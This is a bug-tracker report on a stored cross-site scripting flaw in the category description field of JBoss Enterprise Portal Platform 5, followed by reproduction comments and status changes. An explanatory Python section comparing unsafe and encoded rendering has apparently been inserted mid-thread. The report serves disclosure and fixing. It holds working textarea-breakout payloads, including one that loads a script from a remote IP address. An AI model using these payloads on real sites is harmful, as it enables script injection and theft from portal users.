Bug 793926 (JBEPP-997) - XSS issue in category description
Summary: XSS issue in category description
Keywords:
Status: CLOSED NEXTRELEASE
Alias: JBEPP-997
Product: JBoss Enterprise Portal Platform 5
Classification: JBoss
Component: unspecified
Version: 5.1.1.GA
Hardware: Unspecified
OS: Unspecified
Priority: high
Severity: high
Target Milestone: ---
Target Release: 5.1.1.DEV03,5.2.0.DEV02
Assignee: Thomas Heute
QA Contact:
URL: http://jira.jboss.org/jira/browse/JBE...
Whiteboard:
Depends On:
Blocks:
Reported: 2011-07-08 08:35 UTC by Thomas Heute
Modified: 2012-02-28 16:33 UTC (History)
CC List: 4 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2011-08-11 09:02:29 UTC
Type: Bug




Links
System ID Private Priority Status Summary Last Updated
Red Hat Bugzilla 793281 0 medium CLOSED XSS in page title 2021-02-22 00:41:40 UTC
Red Hat Bugzilla 793952 0 high CLOSED Gadget source is escaped in editor 2021-02-22 00:41:40 UTC
Red Hat Bugzilla 794008 1 None None None 2021-01-20 06:05:38 UTC
Red Hat Issue Tracker JBEPP-997 0 None None None Never


Description Thomas Heute 2011-07-08 08:35:00 UTC
Help Desk Ticket Reference: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
project_key: JBEPP

Our application security center of excellence discovered a cross-site scripting vulnerability with the application registry portlet.  Here are the steps to reproduce:

Steps to Reproduce Exploit:
1. Log in to the application as "Administrators" user role.
2. Click on "Edit Category" button.
3. Type at the "Description" field the following: Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js></script>.
4. Press on "Save" button.
5. Then click on "Edit Category" button.
6. Finally, the script is executed as proof of the vulnerability.

Comment 1 Thomas Heute 2011-07-08 08:51:08 UTC
Link: Added: This issue is related to GTNPORTAL-1955


Comment 2 Thomas Heute 2011-07-08 09:46:34 UTC
Help Desk Ticket Reference: Added: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1


Comment 3 Bruno Machado 2011-07-08 14:59:14 UTC
Pretty much the same steps as in the description of this Jira. I could also reproduce using <script>alert("some string") as shown in step 4.

1. login as root
2. Group -> Administration -> Application Registry
3. Edit Category
4. Type at the "Description" field the following:

Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js>

or

Dashboard</textarea><script>alert("Bad XSS");</script>

5. Click on Save button.
6. Then click on "Edit Category" button.
7. Finally, the script is executed as proof of the vulnerability

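The break-out described in the report and in Comment 3 works because the description is written into the edit form's <textarea> without HTML encoding: the browser treats textarea content as raw text only until it sees the first </textarea (in any letter case), and everything after that is parsed as ordinary markup, including a <script> element. The following Python is an added example, not code from the JBoss EPP / GateIn project: it renders the form the unsafe way, the fixed way (HTML-encode the value), and a tempting but wrong way (strip the literal string from the report), then emulates the browser's tokeniser to show which variant still executes the payload. All function names are hypothetical, the payload strings are the ones quoted on this page (the remote-script variant is represented by the alert() variant so nothing is fetched), and the mixed-case payload goes beyond the page to show why a blacklist of one string is not a fix.

```python
import html
import re

# Constructed sample inputs. PAYLOAD is the second string from Comment 3;
# PAYLOAD_MIXED_CASE is an added variant (not from the report) that a
# browser treats identically, because end tags are matched case-insensitively.
PAYLOAD = 'Dashboard</textarea><script>alert("Bad XSS");</script>'
PAYLOAD_MIXED_CASE = 'Dashboard</TEXTAREA><script>alert("Bad XSS");</script>'


def render_description_unsafe(description: str) -> str:
    """Mirrors the bug: the stored description is dropped into the form unencoded."""
    return '<textarea name="description">' + description + '</textarea>'


def render_description_blacklist(description: str) -> str:
    """A tempting but wrong fix: delete the one string seen in the report."""
    cleaned = description.replace('</textarea>', '')
    return '<textarea name="description">' + cleaned + '</textarea>'


def render_description_safe(description: str) -> str:
    """The fix: HTML-encode the value before it lands inside the element.
    '<' becomes '&lt;', so the browser can never see an early end tag."""
    return '<textarea name="description">' + html.escape(description, quote=True) + '</textarea>'


def browser_textarea_value(markup: str) -> str:
    """Emulate the browser's handling of <textarea> content (RCDATA): the raw
    text runs up to the first case-insensitive '</textarea', and character
    references inside it are decoded. Returns what the user sees in the field."""
    m = re.search(r'<textarea[^>]*>(.*?)</textarea', markup, re.IGNORECASE | re.DOTALL)
    return html.unescape(m.group(1)) if m else ''


def injected_script_tags(markup: str) -> int:
    """Count <script tags that sit outside the textarea, i.e. ones a browser
    would execute. Any value above zero means the break-out worked."""
    outside = re.sub(r'<textarea[^>]*>.*?</textarea\s*>', '', markup,
                     flags=re.IGNORECASE | re.DOTALL)
    return len(re.findall(r'<script\b', outside, re.IGNORECASE))


if __name__ == '__main__':
    for name, render in (('unsafe', render_description_unsafe),
                         ('blacklist', render_description_blacklist),
                         ('safe', render_description_safe)):
        for payload in (PAYLOAD, PAYLOAD_MIXED_CASE):
            page = render(payload)
            print(f'{name:9s} scripts executed={injected_script_tags(page)} '
                  f'field shows={browser_textarea_value(page)!r}')
```

The safe renderer is the only one for which the field round-trips: what the browser shows in the textarea is exactly the stored description, and no <script> element reaches the parser. The blacklist variant stops the literal payload from the report but not its upper-case twin, which is why output encoding in the right context, not payload filtering, is the fix.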
Comment 4 Thomas Heute 2011-07-10 19:23:02 UTC
I don't understand, are you saying that the patch doesn't work ?

Comment 5 Scott Mumford 2011-07-11 01:36:34 UTC
Release Notes Docs Status: Added: Not Required
Release Notes Text: Added: Included in the Release Note for JBEPP-598


Comment 6 Bruno Machado 2011-07-11 21:12:02 UTC
I hadn't seen that the case status was Resolved while I was writing my comment, you can probably ignore it. I haven't tested with 5.1.1.DEV03 yet, I was just saying that the error was happening with the strings "Dashboard</textarea><script src=" and "Dashboard</textarea><script>".

Thanks.

Comment 7 hfnukal@redhat.com 2011-08-02 05:46:47 UTC
Link: Added: This issue is related to JBEPP-1023


Comment 8 hfnukal@redhat.com 2011-08-02 05:47:45 UTC
Link: Added: This issue is related to JBEPP-365


Comment 9 Michal Vanco 2011-08-10 11:54:21 UTC
Re-opening the issue, still present in 5.1.1 GA.

Comment 10 Michal Vanco 2011-08-17 14:58:34 UTC
Link: Added: This issue relates to JBEPP-1079


Comment 11 hfnukal@redhat.com 2011-08-31 15:40:34 UTC
Link: Added: This issue is related to GTNPORTAL-2073


Comment 12 hfnukal@redhat.com 2011-09-07 16:19:03 UTC
Security: Removed: RHT+eXo Added: Public


